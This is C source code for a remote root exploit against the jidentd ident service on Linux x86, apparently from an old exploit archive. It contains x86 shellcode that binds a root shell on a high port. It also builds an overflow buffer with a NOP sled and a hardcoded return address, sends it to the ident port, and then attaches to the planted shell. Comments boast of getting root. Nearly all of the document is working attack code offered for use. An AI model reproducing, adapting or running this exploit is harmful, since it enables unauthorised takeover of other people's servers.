/* * Copyright (c) anathema * All rights reserved. * * jidentd v1 remote root exploit (linux x86). * THIS IS UNPUBLISHED PRIVATE SOURCE CODE -- DO NOT DISTRIBUTE. */ /* * compile : gcc -o own own-jidentd.c * usage : ./own hostname * or : ./own hostname offset * * When you get the `0wned` prompt, you are in an interactive shell. * Type `id` or `whoami` and see that you are r00t ;) */ #include #include #include #include #include #include #include #include #include #include #include #include #include char c0de[] = "\xeb\x49\x5e\x29\xc0\x29\xdb\x40\x89\x46\x04\x40\x89\x06\xb0\x06\x89\x46" "\x08\xb0\x66\x43\x89\xf1\xcd\x80\x89\x06\xb0\x02\x66\x89\x46\x0c\xb0\x90" "\x66\x89\x46\x0e\x8d\x46\x0c\x89\x46\x04\x29\xc0\x89\x46\x10\xb0\x10\x89" "\x46\x08\xb0\x66\x43\xcd\x80\x29\xc0\x40\x89\x46\x04\xb3\x04\xb0\x66\xcd" "\x80\xeb\x02\xeb\x4c\x29\xc0\x89\x46\x04\x89\x46\x08\xb0\x66\x43\xcd\x80" "\x88\xc3\x29\xc9\xb0\x3f\xcd\x80\xb0\x3f\x41\xcd\x80\xb0\x3f\x41\xcd\x80" "\xb8\x2e\x62\x69\x6e\x40\x89\x06\xb8\x2e\x73\x68\x21\x40\x89\x46\x04\x29" "\xc0\x88\x46\x07\x89\x76\x08\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d" "\x56\x0c\xcd\x80\x29\xc0\x40\xcd\x80\xe8\x64\xff\xff\xff"; #define AUTH_PORT 113 #define BD_PORT 36864 #define RETPOS 2090 #define ADDR 0xbffffa94 u_long resolve_host(u_char *host_name) { struct in_addr addr; struct hostent *host_ent; addr.s_addr = inet_addr(host_name); if (addr.s_addr == -1) { host_ent = gethostbyname(host_name); if (!host_ent) return(-1); memcpy((char *)&addr.s_addr, host_ent->h_addr, host_ent->h_length); } return(addr.s_addr); } void shellz(u_long dst_ip) { struct sockaddr_in sin; u_char sock_buf[4096]; fd_set fds; int sock; sock = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP); if (sock == -1) { perror("socket allocation"); exit(-1); } sin.sin_family = AF_INET; sin.sin_port = htons(BD_PORT); sin.sin_addr.s_addr = dst_ip; if (connect(sock, (struct sockaddr *)&sin, sizeof(struct sockaddr)) == -1) { perror("connect"); close(sock); exit(-1); } fprintf(stderr, "0wned\n"); for (;;) { FD_ZERO(&fds); FD_SET(0, &fds); FD_SET(sock, &fds); select(255, &fds, NULL, NULL, NULL); memset(sock_buf, 0, sizeof(sock_buf)); if (FD_ISSET(sock, &fds)) { if (recv(sock, sock_buf, sizeof(sock_buf), 0) == -1) { fprintf(stderr, "Connection closed by remote host.\n"); close(sock); exit(0); } fprintf(stderr, "%s", sock_buf); } if (FD_ISSET(0, &fds)) { read(0, sock_buf, sizeof(sock_buf)); write(sock, sock_buf, strlen(sock_buf)); } } /* NOTREACHED */ } void snd_res(int sock, u_char *buf, ...) { u_char tmp[4096]; va_list list; memset(tmp, 0, sizeof(tmp)); va_start(list, buf); vsnprintf(tmp, sizeof(tmp), buf, list); write(sock, tmp, strlen(tmp)); va_end(list); } void usage(u_char *nomenclature) { fprintf(stderr, "No.\nusage:\t%s dst_ip [offset]\n", nomenclature); exit(-1); } int main(int argc, char **argv) { struct sockaddr_in sin; struct in_addr dst_addr; u_long dst_ip, addr, *ret; u_char buf[4096]; int sock, i = 0, j = 0, offset, retpos = RETPOS; if (argc != 2 && argc != 3) { usage(argv[0]); /* NOTREACHED */ } if (argc > 2) offset = atoi(argv[2]); dst_ip = resolve_host(argv[1]); if (dst_ip == -1) { fprintf(stderr, "What kind of address is this: `%s`?\n", argv[1]); exit(-1); } sock = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP); if (sock == -1) { perror("socket allocation"); exit(-1); } sin.sin_family = AF_INET; sin.sin_port = htons(AUTH_PORT); sin.sin_addr.s_addr = dst_ip; if (connect(sock, (struct sockaddr *)&sin, sizeof(struct sockaddr)) == -1) { perror("connecting to ident daemon"); close(sock); exit(-1); } addr = ADDR + offset; dst_addr.s_addr = dst_ip; fprintf(stderr, "The eyes of stanley pain:\n" " To: %s.%d\n" " Ret: %d\n" "Addr: 0x%lx\n", inet_ntoa(dst_addr), AUTH_PORT, retpos, addr); memset(buf, 0x90, sizeof(buf)); for (i = (retpos - strlen(c0de)); i < retpos; j++, i++) { buf[i] = c0de[j]; } buf[retpos + 5] = 0; ret = (u_long *)(buf + RETPOS); *ret = addr; snd_res(sock, "%s\r\n", buf); sleep(4); shellz(dst_ip); /* NOTREACHED */ } /* www.hack.co.za [2000]*/